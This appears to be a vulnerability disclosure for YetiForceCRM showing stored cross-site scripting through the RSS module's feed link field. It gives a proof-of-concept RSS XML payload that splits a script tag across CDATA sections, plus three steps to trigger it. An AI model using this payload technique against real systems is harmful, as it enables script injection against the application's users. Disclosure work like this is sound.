YetiForceCRM allows user create RSS Feeds without purifying the link field of the input data properly from external source. An attacker can take advantage of this vulnerability to perform an XML Injection attack that leads to stored cross-site scripting (XSS) on the target server.
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>RSS Test</title>
<link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
<description>RSS Test Description</description>
<lastBuildDate>Fri, 12 Aug 2022 00:00:00 -0000</lastBuildDate>
<item>
<title>RSS Test</title>
<link>http://example.com</link>
<description>a post</description>
<author>[email protected]</author>
<pubDate>Fri, 12 Aug 2022 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
Step 1:
Create a file rss_xss.xml
with the content of the payload aboveStep 2:
Add Feed Source via module RssStep 3:
Click Save and the XSS should fire